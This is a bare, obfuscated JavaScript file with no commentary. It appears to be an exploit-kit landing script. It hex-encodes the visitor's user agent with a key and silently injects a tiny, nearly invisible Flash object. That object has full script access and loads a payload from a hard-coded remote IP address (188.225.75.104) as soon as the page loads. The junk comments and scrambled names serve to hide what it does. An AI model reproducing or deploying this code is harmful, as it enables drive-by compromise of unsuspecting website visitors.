/*s33800d1442hssfj80877fs*/function hgfgerdfgdf(num, width){/*s88958d33325hfj32568fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s18464d71422hfj98749fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s81046d55553hfj99701fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s83520d13736hfj45937fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd90563hfs*/c += b + d;/*s47377d10565hfj58132fs*/e += 1;}return c;}/*s76485dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.75.104/?ODM0MDYxNTg=&info=NTI1Njk4ODI=&rand=xXzQMvWdbRXQCJ3EKvrcT6NHMVHRH0CL2YydmrHTefjaeVWkzrLFTF_yozKASwSG6_FtdfJRDV&elsa=K1jECJcwRkn4ZfWg5A9fqqj0DRyxWd1caF_EaEaAhM_cGXRbk82lryzLMkdc0lzhWE61ETi-tL&travel=NDU1Mzc2MDM=", ghnvbn("http://188.225.75.104/?MTA2NTEyOTU4&elsa=wyI9YW1gb8quthkDdnRfP05aG_BSJYwhGqpPEE7No0Vz8xrAWI8l2zxeF7mNXz-stUVgX5gsXlK_7S6CJrg&rand=xH_QMrPYbR7FFYPfKPrEUKdEMU7WA0SKwYyZha_VF5-xFDfGpbH1Fx_spVydCF-EmvJvdLAHIwKh1UfASwQ&info=MjA3NTk1OTA=&arnd=NDI1NjExMjk=","wexykukusw"));